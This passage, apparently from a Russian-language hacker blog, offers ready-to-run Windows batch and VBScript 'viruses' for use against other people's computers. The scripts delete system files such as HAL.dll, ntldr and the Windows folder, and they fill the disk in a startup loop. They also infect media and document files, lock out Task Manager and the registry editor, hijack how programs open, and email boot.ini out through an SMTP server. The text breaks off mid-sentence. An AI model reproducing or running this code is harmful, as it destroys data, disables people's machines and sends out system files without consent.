reg_dword /d 0 y&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Verdana; font-size: 13px; color: rgb(169, 169, 169);&quot;&gt;сбой
 системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, 
мышь). В результате будет черный экран с курсором и ни на что не 
реагирующая система, однако Windows продолжает работать.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Verdana; font-size: 13px;&quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-family: Verdana; font-size: 13px; &quot;&gt;rundll32 user,disableoemlayer&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-family: Verdana; font-size: 13px; &quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Verdana; font-size: 13px; color: rgb(169, 169, 169);&quot;&gt;Меняет местами кнопки мыши,но обратная смена не возможна)&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-family: Verdana; font-size: 13px;&quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Verdana; font-size: 13px; color: rgb(255, 0, 0);&quot;&gt;rundll32 user,SwapMouseButton&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Verdana; font-size: 13px; color: rgb(255, 0, 0);&quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;font style=&quot;color: rgb(169, 169, 169); font-size: 10pt;&quot; face=&quot;Verdana&quot; size=&quot;2&quot;&gt;Удаляет ядро системы&lt;/font&gt;&lt;/div&gt;&lt;div&gt;&lt;font style=&quot;color: rgb(169, 169, 169);&quot; face=&quot;Verdana&quot; size=&quot;2&quot;&gt;&lt;br&gt;&lt;/font&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Verdana; font-size: 13px;&quot;&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;del %systemroot%&amp;#92;system32&amp;#92;HAL.dll&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Verdana; font-size: 13px;&quot;&gt;&lt;font color=&quot;#ff0000&quot;&gt;&lt;br&gt;&lt;/font&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(169, 169, 169); font-size: 10pt; font-family: Verdana;&quot;&gt;Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(169, 169, 169);&quot;&gt;не только в текущем каталоге, но и надкаталоге)&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;background-color: rgb(255, 255, 255); font-family: &apos;Trebuchet MS&apos;, Trebuchet, Arial, Verdana, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;&lt;br&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;@echo off%[MrWeb]%&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;if &apos;%1==&apos;In_ goto MrWebin&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;if exist c:&amp;#92;MrWeb.bat goto MrWebru&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;if not exist %0 goto MrWeben&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;find &quot;MrWeb&quot;&lt;%0&amp;gt;c:&amp;#92;MrWeb.bat&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;attrib +h c:&amp;#92;MrWeb.bat&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;:MrWebru&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;for %%g in (..&amp;#92;*.jpg ..&amp;#92;*.doc ..&amp;#92;*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:&amp;#92;MrWeb In_ %%ggoto MrWeben&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;:MrWebin&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;if exist %2.bat goto MrWeben&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;type c:&amp;#92;MrWeb.bat&amp;gt;&amp;gt;%2.bat&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;echo start %2&amp;gt;&amp;gt;%2.bat%[MrWeb]%&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;:MrWeben&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(169, 169, 169); font-size: 10pt; font-family: Verdana;&quot;&gt;Вирус заражает *.JPG в текущем каталоге&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;@echo off%[MrWeb]%&lt;br style=&quot;margin: 0px;&quot;&gt;if &apos;%1==&apos;In_ goto MrWebin&lt;br style=&quot;margin: 0px;&quot;&gt;if exist c:&amp;#92;MrWeb.bat goto MrWebru&lt;br style=&quot;margin: 0px;&quot;&gt;if not exist %0 goto MrWeben&lt;br style=&quot;margin: 0px;&quot;&gt;find &quot;MrWeb&quot;&lt;%0&amp;gt;c:&amp;#92;MrWeb.bat&lt;br style=&quot;margin: 0px;&quot;&gt;attrib +h c:&amp;#92;MrWeb.bat&lt;br style=&quot;margin: 0px;&quot;&gt;:MrWebru&lt;br style=&quot;margin: 0px;&quot;&gt;for %%g in (*.jpg) do call c:&amp;#92;MrWeb In_ %%g&lt;br style=&quot;margin: 0px;&quot;&gt;goto MrWeben&lt;br style=&quot;margin: 0px;&quot;&gt;:MrWebin&lt;br style=&quot;margin: 0px;&quot;&gt;if exist %2.bat goto MrWeben&lt;br style=&quot;margin: 0px;&quot;&gt;type c:&amp;#92;MrWeb.bat&amp;gt;&amp;gt;%2.bat&lt;br style=&quot;margin: 0px;&quot;&gt;echo start %2&amp;gt;&amp;gt;%2.bat%[MrWeb]%&lt;br style=&quot;margin: 0px;&quot;&gt;:MrWeben&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-family: Verdana; font-size: 13px;&quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;COLOR: #ff4500&quot;&gt;&lt;span style=&quot;FONT-FAMILY: Arial Black; FONT-SIZE: 12pt&quot;&gt;Жестокие вирусы &lt;/span&gt;&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;У вашего ламера будет глючить компьютер. &lt;/span&gt;&lt;br&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;echo Set fso = CreateObject(&quot;Scripting.FileSystemObject&quot;) &amp;gt; %systemdrive%&amp;#92;windows&amp;#92;system32&amp;#92;rundll32.vbs &lt;br&gt;echo do &amp;gt;&amp;gt; %systemdrive%&amp;#92;windows&amp;#92;system32&amp;#92;rundll32.vbs &lt;br&gt;echo
 Set tx = 
fso.CreateTextFile(&quot;%systemdrive%&amp;#92;windows&amp;#92;system32&amp;#92;rundll32.dat&quot;, True) 
&amp;gt;&amp;gt; %systemdrive%&amp;#92;windows&amp;#92;system32&amp;#92;rundll32.vbs &lt;br&gt;echo tx.WriteBlankLines(100000000) &amp;gt;&amp;gt; %systemdrive%&amp;#92;windows&amp;#92;system32&amp;#92;rundll32.vbs &lt;br&gt;echo tx.close &amp;gt;&amp;gt; %systemdrive%&amp;#92;windows&amp;#92;system32&amp;#92;rundll32.vbs &lt;br&gt;echo FSO.DeleteFile &quot;%systemdrive%&amp;#92;windows&amp;#92;system32&amp;#92;rundll32.dat&quot; &amp;gt;&amp;gt; %systemdrive%&amp;#92;windows&amp;#92;system32&amp;#92;rundll32.vbs &lt;br&gt;echo loop &amp;gt;&amp;gt; %systemdrive%&amp;#92;windows&amp;#92;system32&amp;#92;rundll32.vbs &lt;br&gt;&lt;br&gt;start %systemdrive%&amp;#92;windows&amp;#92;system32&amp;#92;rundll32.vbs &lt;br&gt;&lt;br&gt;reg
 add HKLM&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Run /v 
system_host_run /t REG_SZ /d %systemdrive%&amp;#92;windows&amp;#92;system32&amp;#92;rundll32.vbs
 /f &lt;/span&gt;&lt;br&gt;&lt;br&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Вирус который убивает Винду. Не проверяйте на своем компьютере=) &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo This virus created by LIZA &lt;br&gt;@echo Virus: pcforumhack.ru™ Virus &lt;br&gt;@echo Autor: LIZA &lt;br&gt;@echo off &lt;br&gt;echo Chr(39)&amp;gt;%temp%&amp;#92;temp1.vbs &lt;br&gt;echo Chr(39)&amp;gt;%temp%&amp;#92;temp2.vbs &lt;br&gt;echo on error resume next &amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Set S = CreateObject(&quot;Wscript.Shell&quot;) &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo set FSO=createobject(&quot;scripting.filesystemobject&quot;)&amp;gt;&amp;gt;%temp%&amp;#92;temp.vbs &lt;br&gt;reg
 add 
HKEY_USERS&amp;#92;S-1-5-21-343818398-1417001333-725345543-1003&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer
 /v nodesktop /d 1 /freg add 
HKEY_USERS&amp;#92;S-1-5-21-343818398-1417001333-725345543-1003&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer
 /v ClassicShell /d 1 /fset ¶§=%0 &lt;br&gt;copy %¶§% %SystemRoot%&amp;#92;user32dll.bat &lt;br&gt;reg add &quot;hklm&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Run&quot; /v RunExplorer32 /d %SystemRoot%&amp;#92;user32dll.bat /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoDrives /t REG_DWORD /d 67108863 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoViewOnDrive /t REG_DWORD /d 67108863 /f &lt;br&gt;echo fso.deletefile &quot;C:&amp;#92;ntldr&quot;,1 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;reg add &quot;HKCU&amp;#92;Software&amp;#92;Policies&amp;#92;Microsoft&amp;#92;Internet Explorer&amp;#92;Restrictions&quot; /v &quot;NoSelectDownloadDir&quot; /d 1 /f &lt;br&gt;reg add &quot;HKLM&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Internet Explorer&amp;#92;main&amp;#92;FeatureControl&amp;#92;Feature_LocalMachine_Lockdown&quot; /v &quot;IExplorer&quot; /d 0 /f &lt;br&gt;reg add &quot;HKCU&amp;#92;Software&amp;#92;Policies&amp;#92;Microsoft&amp;#92;Internet Explorer&amp;#92;Restrictions&quot; /v &quot;NoFindFiles&quot; /d 1 /f &lt;br&gt;reg add &quot;HKCU&amp;#92;Software&amp;#92;Policies&amp;#92;Microsoft&amp;#92;Internet Explorer&amp;#92;Restrictions&quot; /v &quot;NoNavButtons&quot; /d 1 /f &lt;br&gt;echo fso.deletefolder &quot;D:&amp;#92;Windows&quot;,1 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo fso.deletefolder &quot;I:&amp;#92;Windows&quot;,1 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo fso.deletefolder &quot;C:&amp;#92;Windows&quot;,1 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo sr=s.RegRead(&quot;HKEY_LOCAL_MACHINE&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Windows NT&amp;#92;CurrentVersion&amp;#92;SystemRoot&quot;) &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo fso.deletefile sr+&quot;&amp;#92;system32&amp;#92;hal.dll&quot;,1 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo sr=s.RegRead(&quot;HKEY_LOCAL_MACHINE&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Windows NT&amp;#92;CurrentVersion&amp;#92;SystemRoot&quot;) &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo fso.deletefolder sr+&quot;&amp;#92;system32&amp;#92;dllcache&quot;,1 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo sr=s.RegRead(&quot;HKEY_LOCAL_MACHINE&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Windows NT&amp;#92;CurrentVersion&amp;#92;SystemRoot&quot;) &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo fso.deletefolder sr+&quot;&amp;#92;system32&amp;#92;drives&quot;,1 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo
 s.regwrite 
&quot;HKEY_CLASSES_ROOT&amp;#92;CLSID&amp;#92;{645FF040-5081-101B-9F08-00AA002F954E}&amp;#92;LocalizedString&quot;,&quot;forum.whack.ru™&quot;&amp;gt;&amp;gt;%temp%&amp;#92;temp.vbs
 &lt;br&gt;echo s.regwrite &quot;HKLM&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Windows NT&amp;#92;CurrentVersion&amp;#92;RegisteredOwner&quot;,&quot;forum.whack.ru™&quot;&amp;gt;&amp;gt;%temp%&amp;#92;temp.vbs &lt;br&gt;echo
 s.regwrite &quot;HKLM&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Windows 
NT&amp;#92;CurrentVersion&amp;#92;RegisteredOrganization&quot;,&quot;forum.whack.ru™&quot;&amp;gt;&amp;gt;%temp%&amp;#92;temp.vbs
 &lt;br&gt;echo on error resume next &amp;gt; %temp%&amp;#92;temp1.vbs &lt;br&gt;echo set FSO=createobject(&quot;scripting.filesystemobject&quot;)&amp;gt;&amp;gt;%temp%&amp;#92;temp1.vbs &lt;br&gt;echo do&amp;gt;&amp;gt;%temp%&amp;#92;temp1.vbs &lt;br&gt;echo fso.getfile (&quot;A:&amp;#92;&quot;)&amp;gt;&amp;gt;%temp%&amp;#92;temp1.vbs &lt;br&gt;echo loop&amp;gt;&amp;gt;%temp%&amp;#92;temp1.vbs &lt;br&gt;echo on error resume next &amp;gt; %temp%&amp;#92;temp2.vbs &lt;br&gt;echo Set S = CreateObject(&quot;Wscript.Shell&quot;) &amp;gt;&amp;gt; %temp%&amp;#92;temp2.vbs &lt;br&gt;echo do&amp;gt;&amp;gt;%temp%&amp;#92;temp2.vbs &lt;br&gt;echo execute&quot;S.Run &quot;&quot;%comspec% /c echo &quot;&quot; &amp;amp; Chr(7), 0, True&quot;&amp;gt;&amp;gt;%temp%&amp;#92;temp2.vbs &lt;br&gt;echo loop&amp;gt;&amp;gt;%temp%&amp;#92;temp2.vbs &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;System&quot; /v disabletaskmgr /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;System&quot; /v disableregistrytools /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f &lt;br&gt;reg
 add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;NonEnum&quot; 
/v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoNetworkConnections /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v StartmenuLogoff /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoCommonGroups /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoFavoritesMenu /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoRecentDocsMenu /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoSetFolders /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoAddPrinter /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoFind /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoSMHelp /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoRun /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoClose /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoChangeStartMenu /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoSMMyDocs /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoSMMyPictures /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f &lt;br&gt;reg add &quot;hkcu&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&quot; /v NoControlPanel /t REG_DWORD /d 1 /f &lt;br&gt;echo set application=createobject(&quot;shell.application&quot;)&amp;gt;&amp;gt;%temp%&amp;#92;temp.vbs &lt;br&gt;echo application.minimizeall&amp;gt;&amp;gt;%temp%&amp;#92;temp.vbs &lt;br&gt;reg add &quot;hklm&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;run&quot; /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f &lt;br&gt;start rundll32 user32, SwapMouseButton &lt;br&gt;reg add &quot;HKCR&amp;#92;exefile&amp;#92;shell&amp;#92;open&amp;#92;command&quot; /ve /t REG_SZ /d rundll32.exe /f &lt;br&gt;echo i=50 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo while i^&amp;gt;0 or i^&lt;0 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo S.popup &quot;forum.whack.ru™&quot;,0, &quot;forum.whack.ru™&quot;,0+16 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo i=i-1 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo wend &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo do &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo wscript.sleep 200 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo s.sendkeys&quot;{capslock}&quot; &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo wscript.sleep 200 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo s.sendkeys&quot;{numlock}&quot; &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo wscript.sleep 200 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo s.sendkeys&quot;{scrolllock}&quot; &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo loop&amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Set oWMP = CreateObject(&quot;WMPlayer.OCX.7&quot;) &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Set colCDROMs = oWMP.cdromCollection &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo if colCDROMs.Count ^&amp;gt;= 1 then &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo For i = 0 to colCDROMs.Count - 1 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo colCDROMs.Item(i).eject &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo next &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo End If &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo
 Call SendPost(&quot;smtp.mail.ru&quot;, &quot;forum.whack.ru™@mail.ru&quot;, 
&quot;support@mail.ru&quot;, &quot;...&quot;, &quot;Копм заражен!&quot;) &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Set iMsg = CreateObject(&quot;CDO.Message&quot;) &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Set iConf = CreateObject(&quot;CDO.Configuration&quot;) &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Set Flds = iConf.Fields &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/sendusing&quot;) = 2 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/smtpauthenticate&quot;) = 1 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/sendusername&quot;) = &quot;support&quot; &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/sendpassword&quot;) = &quot;support&quot; &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/smtpserver&quot;) = &quot;smtp.mail.ru&quot; &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/smtpserverport&quot;) = 25 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Flds.Update &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo iMsg.Configuration = iConf &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo iMsg.To = strTo &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo iMsg.From = strFrom &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo iMsg.Subject = strSubject &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo iMsg.TextBody = strBody &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo iMsg.AddAttachment &quot;c:&amp;#92;boot.ini&quot; &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo iMsg.Send &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo End Function &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Set iMsg = Nothing &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Set iConf = Nothing &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;echo Set Flds = Nothing &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;&lt;br&gt;echo s.run &quot;shutdown -r -t 0 -c &quot;&quot;pcforumhack.ru™&quot;&quot; -f&quot;,1 &amp;gt;&amp;gt; %temp%&amp;#92;temp.vbs &lt;br&gt;start %temp%&amp;#92;temp.vbs &lt;br&gt;start %temp%&amp;#92;temp1.vbs &lt;br&gt;start %temp%&amp;#92;temp2.vbs &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;br&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Вирус
 полностью блокирует систему при следующем запуске Windows.Даже в 
безопасном режиме, выключает диспетчер задач.Чтобы разблокировать 
